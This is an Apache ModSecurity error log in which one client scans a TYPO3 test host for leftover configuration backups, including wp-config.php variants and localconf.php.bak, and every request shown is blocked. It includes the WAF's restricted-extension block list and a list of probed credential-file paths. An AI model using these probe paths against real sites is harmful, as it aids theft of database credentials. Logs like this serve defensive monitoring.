[Fri Apr 05 03:01:46.461309 2024] [:error] [pid 2272636] [client 91.215.85.29:52918] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpsso_server/caches/configs/system.php.backup"] [unique_id "Zg9Neu7eMoB0OR9e06enrQAAAAQ"]
[Fri Apr 05 03:01:46.463061 2024] [:error] [pid 2272636] [client 91.215.85.29:52918] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpsso_server/caches/configs/system.php.backup"] [unique_id "Zg9Neu7eMoB0OR9e06enrQAAAAQ"]
[Fri Apr 05 03:01:46.514783 2024] [authz_core:error] [pid 2272634] [client 91.215.85.29:52930] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpsso_server
[Fri Apr 05 03:01:46.527696 2024] [:error] [pid 2273014] [client 91.215.85.29:52940] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpsso_server/caches/configs/system.php.old"] [unique_id "Zg9NetqZi0hNKs0Q6mN6dQAAAAY"]
[Fri Apr 05 03:01:46.528055 2024] [:error] [pid 2273014] [client 91.215.85.29:52940] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpsso_server/caches/configs/system.php.old"] [unique_id "Zg9NetqZi0hNKs0Q6mN6dQAAAAY"]
[Fri Apr 05 03:01:46.528210 2024] [:error] [pid 2273014] [client 91.215.85.29:52940] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpsso_server/caches/configs/system.php.old"] [unique_id "Zg9NetqZi0hNKs0Q6mN6dQAAAAY"]
[Fri Apr 05 03:01:46.559376 2024] [authz_core:error] [pid 2272636] [client 91.215.85.29:53004] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site
[Fri Apr 05 03:01:46.572735 2024] [authz_core:error] [pid 2272632] [client 91.215.85.29:53016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site
[Fri Apr 05 03:01:46.597161 2024] [:error] [pid 2272633] [client 91.215.85.29:53024] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/site/default/settings.php.old"] [unique_id "Zg9NevUzfkmOvnEGQl8iBQAAAAE"]
[Fri Apr 05 03:01:46.597528 2024] [:error] [pid 2272633] [client 91.215.85.29:53024] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/default/settings.php.old"] [unique_id "Zg9NevUzfkmOvnEGQl8iBQAAAAE"]
[Fri Apr 05 03:01:46.597689 2024] [:error] [pid 2272633] [client 91.215.85.29:53024] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/default/settings.php.old"] [unique_id "Zg9NevUzfkmOvnEGQl8iBQAAAAE"]
[Fri Apr 05 03:01:46.655044 2024] [:error] [pid 2272636] [client 91.215.85.29:53082] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/system/config/default.php.backup"] [unique_id "Zg9Neu7eMoB0OR9e06enrwAAAAQ"]
[Fri Apr 05 03:01:46.655447 2024] [:error] [pid 2272636] [client 91.215.85.29:53082] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/config/default.php.backup"] [unique_id "Zg9Neu7eMoB0OR9e06enrwAAAAQ"]
[Fri Apr 05 03:01:46.655614 2024] [:error] [pid 2272636] [client 91.215.85.29:53082] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/config/default.php.backup"] [unique_id "Zg9Neu7eMoB0OR9e06enrwAAAAQ"]
[Fri Apr 05 03:01:46.661046 2024] [authz_core:error] [pid 2272635] [client 91.215.85.29:53090] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/system
[Fri Apr 05 03:01:46.668730 2024] [authz_core:error] [pid 2273023] [client 91.215.85.29:53102] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/system
[Fri Apr 05 03:01:46.742778 2024] [:error] [pid 2273014] [client 91.215.85.29:53150] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/textpattern/config.php.backup"] [unique_id "Zg9NetqZi0hNKs0Q6mN6dwAAAAY"]
[Fri Apr 05 03:01:46.743149 2024] [:error] [pid 2273014] [client 91.215.85.29:53150] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/textpattern/config.php.backup"] [unique_id "Zg9NetqZi0hNKs0Q6mN6dwAAAAY"]
[Fri Apr 05 03:01:46.743321 2024] [:error] [pid 2273014] [client 91.215.85.29:53150] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/textpattern/config.php.backup"] [unique_id "Zg9NetqZi0hNKs0Q6mN6dwAAAAY"]
[Fri Apr 05 03:01:46.753624 2024] [authz_core:error] [pid 2272636] [client 91.215.85.29:53152] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/textpattern
[Fri Apr 05 03:01:46.763089 2024] [authz_core:error] [pid 2272635] [client 91.215.85.29:53168] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/textpattern
[Fri Apr 05 03:01:46.801613 2024] [:error] [pid 2273022] [client 91.215.85.29:52868] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/installation/configuration.php.backup"] [unique_id "Zg9Neucq0MKk4dQcUq6hnwAAAAc"]
[Fri Apr 05 03:01:46.801982 2024] [:error] [pid 2273022] [client 91.215.85.29:52868] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/installation/configuration.php.backup"] [unique_id "Zg9Neucq0MKk4dQcUq6hnwAAAAc"]
[Fri Apr 05 03:01:46.802125 2024] [:error] [pid 2273022] [client 91.215.85.29:52868] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/installation/configuration.php.backup"] [unique_id "Zg9Neucq0MKk4dQcUq6hnwAAAAc"]
[Fri Apr 05 03:01:46.831646 2024] [authz_core:error] [pid 2272633] [client 91.215.85.29:53244] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/typo3conf/localconf.php.bak
[Fri Apr 05 03:01:46.876233 2024] [:error] [pid 2273014] [client 91.215.85.29:53274] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/typo3conf/localconf.php.old"] [unique_id "Zg9NetqZi0hNKs0Q6mN6eAAAAAY"]
[Fri Apr 05 03:01:46.876632 2024] [:error] [pid 2273014] [client 91.215.85.29:53274] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/typo3conf/localconf.php.old"] [unique_id "Zg9NetqZi0hNKs0Q6mN6eAAAAAY"]
[Fri Apr 05 03:01:46.876790 2024] [:error] [pid 2273014] [client 91.215.85.29:53274] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/typo3conf/localconf.php.old"] [unique_id "Zg9NetqZi0hNKs0Q6mN6eAAAAAY"]
[Fri Apr 05 03:01:46.918999 2024] [:error] [pid 2272636] [client 91.215.85.29:53302] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.1"] [unique_id "Zg9Neu7eMoB0OR9e06ensQAAAAQ"]
[Fri Apr 05 03:01:46.919257 2024] [:error] [pid 2272636] [client 91.215.85.29:53302] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.1"] [unique_id "Zg9Neu7eMoB0OR9e06ensQAAAAQ"]
[Fri Apr 05 03:01:46.919439 2024] [:error] [pid 2272636] [client 91.215.85.29:53302] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.1"] [unique_id "Zg9Neu7eMoB0OR9e06ensQAAAAQ"]
[Fri Apr 05 03:01:46.946207 2024] [authz_core:error] [pid 2272635] [client 91.215.85.29:53322] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.dist
[Fri Apr 05 03:01:46.953359 2024] [:error] [pid 2273023] [client 91.215.85.29:53308] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "Zg9NelZZkX66RL67OT99AQAAAAg"]
[Fri Apr 05 03:01:46.953529 2024] [:error] [pid 2273023] [client 91.215.85.29:53308] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "Zg9NelZZkX66RL67OT99AQAAAAg"]
[Fri Apr 05 03:01:46.953782 2024] [:error] [pid 2273023] [client 91.215.85.29:53308] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "Zg9NelZZkX66RL67OT99AQAAAAg"]
[Fri Apr 05 03:01:46.953938 2024] [:error] [pid 2273023] [client 91.215.85.29:53308] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "Zg9NelZZkX66RL67OT99AQAAAAg"]
[Fri Apr 05 03:01:47.034532 2024] [:error] [pid 2273022] [client 91.215.85.29:53342] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.tmp"] [unique_id "Zg9Ne-cq0MKk4dQcUq6hoAAAAAc"]
[Fri Apr 05 03:01:47.034803 2024] [:error] [pid 2273022] [client 91.215.85.29:53342] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.tmp"] [unique_id "Zg9Ne-cq0MKk4dQcUq6hoAAAAAc"]
[Fri Apr 05 03:01:47.034978 2024] [:error] [pid 2273022] [client 91.215.85.29:53342] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.tmp"] [unique_id "Zg9Ne-cq0MKk4dQcUq6hoAAAAAc"]
[Fri Apr 05 03:01:47.035502 2024] [:error] [pid 2272632] [client 91.215.85.29:53340] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "Zg9Nexd3u0Yvuu6g37bWhAAAAAA"]
[Fri Apr 05 03:01:47.035723 2024] [:error] [pid 2272632] [client 91.215.85.29:53340] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "Zg9Nexd3u0Yvuu6g37bWhAAAAAA"]
[Fri Apr 05 03:01:47.035871 2024] [:error] [pid 2272632] [client 91.215.85.29:53340] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "Zg9Nexd3u0Yvuu6g37bWhAAAAAA"]
